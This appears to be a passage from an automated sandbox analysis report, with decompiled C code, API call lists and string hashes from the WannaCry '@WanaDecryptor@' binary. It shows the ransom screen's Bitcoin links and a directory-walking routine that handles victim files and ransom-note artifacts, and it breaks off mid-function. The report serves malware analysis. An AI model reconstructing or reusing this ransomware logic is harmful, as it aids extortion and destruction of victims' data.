                                  					_t245 =  *(_t352 + 4);
                                  				} else {
                                  					_t245 = 0;
                                  				}
                                  				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
                                  				_push(0x3fa);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t352 =  *(_t352 + 4);
                                  				}
                                  				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
                                  				_push(0x402);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t248 =  *(_t216 + 4);
                                  				} else {
                                  					_t248 = 0;
                                  				}
                                  				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
                                  				_push(0x3ef);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t251 =  *(_t216 + 4);
                                  				} else {
                                  					_t251 = 0;
                                  				}
                                  				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
                                  				_push(0x3eb);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t253 =  *(_t216 + 4);
                                  				} else {
                                  					_t253 = 0;
                                  				}
                                  				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
                                  				_push(0x3ec);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t216 =  *(_t216 + 4);
                                  				}
                                  				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
                                  				_push(_t348 + 0x5be);
                                  				L00412DA0();
                                  				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				_t260 = _t348 + 0x360;
                                  				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				_push(_t260);
                                  				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                  				L00412CAA();
                                  				_t262 = _t348 + 0x228;
                                  				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
                                  				_push(_t262);
                                  				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                  				L00412CAA();
                                  				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
                                  				L00412DA6();
                                  				_push(_t348 + 0x58c);
                                  				_push("mailto:%s");
                                  				_push(_t356 + 0x10);
                                  				 *(_t356 + 0xf8) = 0;
                                  				L00412E00();
                                  				_t357 = _t356 + 8;
                                  				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
                                  				L00412F56();
                                  				E00404210(_t348 + 0x2f8, _t357 + 0x14);
                                  				E00404270(_t348 + 0x888);
                                  				_push( *((intOrPtr*)(_t348 + 0x508)));
                                  				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
                                  				_push(_t357 + 0x10);
                                  				L00412E00();
                                  				_t358 = _t357 + 8;
                                  				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
                                  				L00412F56();
                                  				E00404210(_t348 + 0x360, _t358 + 0x14);
                                  				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
                                  				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				L00412F50();
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				 *( *(_t348 + 0x164)) = 0xe0;
                                  				( *(_t348 + 0x164))[1] = 0xe000;
                                  				L00412F50();
                                  				 *( *(_t348 + 0x1e8)) = 0xe0;
                                  				( *(_t348 + 0x1e8))[1] = 0xe000;
                                  				_t342 = _t348 + 0x3c8;
                                  				E00405820(_t348 + 0x3c8, 1);
                                  				E00405800(_t348 + 0x3c8, 0xb);
                                  				E00405200(_t348 + 0x3c8, 0);
                                  				_push( *(_t348 + 0x824));
                                  				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
                                  				E00405860(_t342, 0xb);
                                  				E004058C0(_t342, 1);
                                  				E00405990(_t342, 1, 0x20);
                                  				E00405180(_t342, "00;00;00;00");
                                  				_t343 = _t348 + 0x444;
                                  				E00405820(_t348 + 0x444, 1);
                                  				E00405800(_t348 + 0x444, 0xb);
                                  				E00405200(_t348 + 0x444, 0);
                                  				_push( *(_t348 + 0x824));
                                  				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
                                  				E00405860(_t343, 0xb);
                                  				E004058C0(_t343, 1);
                                  				E00405990(_t343, 1, 0x20);
                                  				E00405180(_t343, "00;00;00;00");
                                  				GetTimeZoneInformation(_t358 + 0x38);
                                  				_push(_t358 + 0x28);
                                  				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                  				_t359 = _t358 + 8;
                                  				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18);
                                  				_push( *(_t359 + 0x24) & 0x0000ffff);
                                  				_push( *(_t359 + 0x22) & 0x0000ffff);
                                  				_push( *(_t359 + 0x20) & 0x0000ffff);
                                  				_push( *(_t359 + 0x1c) & 0x0000ffff);
                                  				_push( *(_t359 + 0x26) & 0x0000ffff);
                                  				_push( *(_t359 + 0x26) & 0x0000ffff);
                                  				_push("%d/%d/%d %02d:%02d:%02d");
                                  				_push(_t348 + 0x500);
                                  				L00412E00();
                                  				_push(_t359 + 0x48);
                                  				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                  				_t360 = _t359 + 0x28;
                                  				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18);
                                  				_push( *(_t360 + 0x24) & 0x0000ffff);
                                  				_push( *(_t360 + 0x22) & 0x0000ffff);
                                  				_push( *(_t360 + 0x20) & 0x0000ffff);
                                  				_push( *(_t360 + 0x20) & 0x0000ffff);
                                  				_push( *(_t360 + 0x26) & 0x0000ffff);
                                  				_push( *(_t360 + 0x26) & 0x0000ffff);
                                  				_t214 = _t348 + 0x504;
                                  				_push("%d/%d/%d %02d:%02d:%02d");
                                  				_push(_t214);
                                  				L00412E00();
                                  				_t361 = _t360 + 0x20;
                                  				_push(0);
                                  				L00412E06();
                                  				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
                                  				return _t214;
                                  			}

                                  APIs
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FBC
                                  • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FCF
                                  • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FE2
                                  • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FF5
                                  • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407005
                                  • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407018
                                  • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040702B
                                  • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040703E
                                  • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407051
                                  • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407064
                                  • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040709C
                                  • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 004070CE
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407104
                                  • #3092.MFC42(000003ED,00000000,?,765920C0,?), ref: 00407110
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                  • #3092.MFC42(000003FE,?,765920C0,?), ref: 00407134
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                  • #3092.MFC42(000003FB,?,765920C0,?), ref: 00407156
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                  • #3092.MFC42(000003FF,?,765920C0,?), ref: 00407178
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                  • #3092.MFC42(000003FC,?,765920C0,?), ref: 0040719A
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                  • #3092.MFC42(00000400,?,765920C0,?), ref: 004071BC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                  • #3092.MFC42(000003FA,?,765920C0,?), ref: 004071DE
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                  • #3092.MFC42(00000402,?,765920C0,?), ref: 004071FC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                  • #3092.MFC42(000003EF,?,765920C0,?), ref: 0040721E
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                  • #3092.MFC42(000003EB,?,765920C0,?), ref: 00407240
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                  • #3092.MFC42(000003EC,?,765920C0,?), ref: 00407262
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                  • #860.MFC42(?,?,765920C0,?), ref: 00407288
                                  • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,765920C0,?), ref: 004072F9
                                  • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,765920C0,?), ref: 00407315
                                  • #540.MFC42(?,?,?,?,765920C0,?), ref: 00407329
                                  • #2818.MFC42(?,mailto:%s,?,?,?,?,?,765920C0,?), ref: 0040734A
                                  • #535.MFC42(?), ref: 0040735D
                                  • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                  • #535.MFC42(?), ref: 00407398
                                    • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                    • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                  • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                  • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                    • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                    • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                    • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                    • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                    • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                    • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                    • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                    • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                    • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                  • #6334.MFC42(00000000), ref: 00407607
                                  • #800.MFC42 ref: 0040761B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                  • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                  • API String ID: 28786460-3869059234
                                  • Opcode ID: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                  • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                  • Opcode Fuzzy Hash: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                  • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
                                  				void* _t109;
                                  				intOrPtr* _t110;
                                  				int _t111;
                                  				void* _t115;
                                  				intOrPtr* _t116;
                                  				intOrPtr* _t123;
                                  				intOrPtr _t124;
                                  				char _t125;
                                  				intOrPtr* _t129;
                                  				intOrPtr* _t131;
                                  				intOrPtr* _t135;
                                  				int _t139;
                                  				int _t145;
                                  				int _t146;
                                  				int _t147;
                                  				int _t149;
                                  				int _t154;
                                  				intOrPtr* _t221;
                                  				void _t225;
                                  				intOrPtr* _t226;
                                  				wchar_t* _t227;
                                  				intOrPtr* _t228;
                                  				intOrPtr* _t229;
                                  				void* _t231;
                                  				void* _t232;
                                  				intOrPtr _t234;
                                  				void* _t235;
                                  				void* _t236;
                                  				void* _t237;
                                  				void* _t238;
                                  				void* _t239;
                                  				void* _t240;
                                  				void* _t242;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041356E);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t234;
                                  				_t235 = _t234 - 0x56c;
                                  				_t232 = __ecx;
                                  				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                  				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                  				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                  				 *(_t235 + 0x584) = 0;
                                  				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                  				 *((char*)(_t235 + 0x588)) = 1;
                                  				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                  				_t236 = _t235 + 0xc;
                                  				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                  				 *(_t236 + 0x18) = _t109;
                                  				if(_t109 != 0xffffffff) {
                                  					while(1) {
                                  						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  						if(_t110 != 0 &&  *_t110 != 0) {
                                  							break;
                                  						}
                                  						_t111 = wcscmp(_t236 + 0x358, ".");
                                  						_t236 = _t236 + 8;
                                  						if(_t111 != 0) {
                                  							_t139 = wcscmp(_t236 + 0x358, L"..");
                                  							_t236 = _t236 + 8;
                                  							if(_t139 != 0) {
                                  								_push(_t236 + 0x358);
                                  								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                  								_t236 = _t236 + 0x10;
                                  								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                  									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                  									_t236 = _t236 + 8;
                                  									if(_t145 != 0) {
                                  										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                  										_t236 = _t236 + 8;
                                  										if(_t146 != 0) {
                                  											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                  											_t236 = _t236 + 8;
                                  											if(_t147 != 0) {
                                  												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  												_t149 = wcslen(_t236 + 0x5c);
                                  												_t236 = _t236 + 4;
                                  												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                  												 *((char*)(_t236 + 0x590)) = 3;
                                  												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                  												 *((char*)(_t236 + 0x584)) = 1;
                                  												_push(1);
                                  												goto L14;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                  										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  										_t154 = wcslen(_t236 + 0x5c);
                                  										_t236 = _t236 + 4;
                                  										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                  										 *((char*)(_t236 + 0x590)) = 2;
                                  										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                  										 *((char*)(_t236 + 0x584)) = 1;
                                  										_push(1);
                                  										L14:
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					FindClose( *(_t236 + 0x20));
                                  					_t115 =  *(_t236 + 0x18);
                                  					_t225 =  *_t115;
                                  					if(_t225 != _t115) {
                                  						while(1) {
                                  							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t135 != 0 &&  *_t135 != 0) {
                                  								goto L22;
                                  							}
                                  							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                  							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                  								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E00402560(_t232, _t136);
                                  							_t225 =  *_t225;
                                  							if(_t225 !=  *(_t236 + 0x18)) {
                                  								continue;
                                  							}
                                  							goto L22;
                                  						}
                                  					}
                                  					L22:
                                  					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                  					_t226 =  *_t116;
                                  					if(_t226 != _t116) {
                                  						while(1) {
                                  							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t131 != 0 &&  *_t131 != 0) {
                                  								goto L28;
                                  							}
                                  							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                  							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                  								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E004026B0(_t232, _t132);
                                  							_t226 =  *_t226;
                                  							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                  								continue;
                                  							}
                                  							goto L28;
                                  						}
                                  					}
                                  					L28:
                                  					_t227 =  *(_t236 + 0x58c);
                                  					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                  					_t237 = _t236 + 0x10;
                                  					DeleteFileW(_t237 + 0x5c);
                                  					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                  					_t238 = _t237 + 0x10;
                                  					DeleteFileW(_t238 + 0x5c);
                                  					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					 *((char*)(_t238 + 0x584)) = 0;
                                  					_t221 = _t123;
                                  					_t228 =  *_t123;
                                  					if(_t228 != _t123) {
                                  						do {
                                  							_t129 = _t228;
                                  							_t228 =  *_t228;
                                  							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                  						} while (_t228 != _t221);
                                  						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					}
                                  					_push(_t123);
                                  					L00412C98();
                                  					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                  					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                  					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                  					_t239 = _t238 + 4;
                                  					_t124 =  *_t229;
                                  					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                  					if(_t124 != _t229) {
                                  						do {
                                  							_push(0);
                                  							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                  						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                  					}
                                  					_push( *((intOrPtr*)(_t239 + 0x28)));
                                  					L00412C98();
                                  					_t240 = _t239 + 4;
                                  					_t125 = 1;
                                  				} else {
                                  					 *((char*)(_t236 + 0x57c)) = 0;
                                  					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                  					_push( *((intOrPtr*)(_t236 + 0x10)));
                                  					L00412C98();
                                  					_t242 = _t236 + 4;
                                  					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                  					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                  					_push( *((intOrPtr*)(_t242 + 0x20)));
                                  					L00412C98();
                                  					_t240 = _t242 + 4;
                                  					_t125 = 0;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                  				return _t125;
                                  			}

                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                  				struct _OVERLAPPED* _v8;
                                  				char _v20;
                                  				long _v32;
                                  				long _v36;
                                  				union _LARGE_INTEGER* _v40;
                                  				void _v44;
                                  				char _v48;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v564;
                                  				union _LARGE_INTEGER* _v568;
                                  				void _v572;
                                  				char _v573;
                                  				short _v575;
                                  				intOrPtr _v579;
                                  				void _v580;
                                  				struct _FILETIME _v588;
                                  				struct _FILETIME _v596;
                                  				struct _FILETIME _v604;
                                  				void* _v608;
                                  				void _v612;
                                  				void _v616;
                                  				void* _v620;
                                  				intOrPtr _v624;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				int _t109;
                                  				int _t113;
                                  				int _t115;
                                  				int _t116;
                                  				int _t118;
                                  				void* _t119;
                                  				signed int _t122;
                                  				signed int _t137;
                                  				signed int _t139;
                                  				int _t140;
                                  				signed int _t141;
                                  				int _t145;
                                  				signed int _t148;
                                  				int _t152;
                                  				int _t155;
                                  				void* _t159;
                                  				intOrPtr _t196;
                                  				signed int _t212;
                                  				signed int _t213;
                                  				void* _t216;
                                  				intOrPtr _t223;
                                  				signed int _t224;
                                  				void* _t226;
                                  				intOrPtr _t227;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x4158c8);
                                  				_push(0x413050);
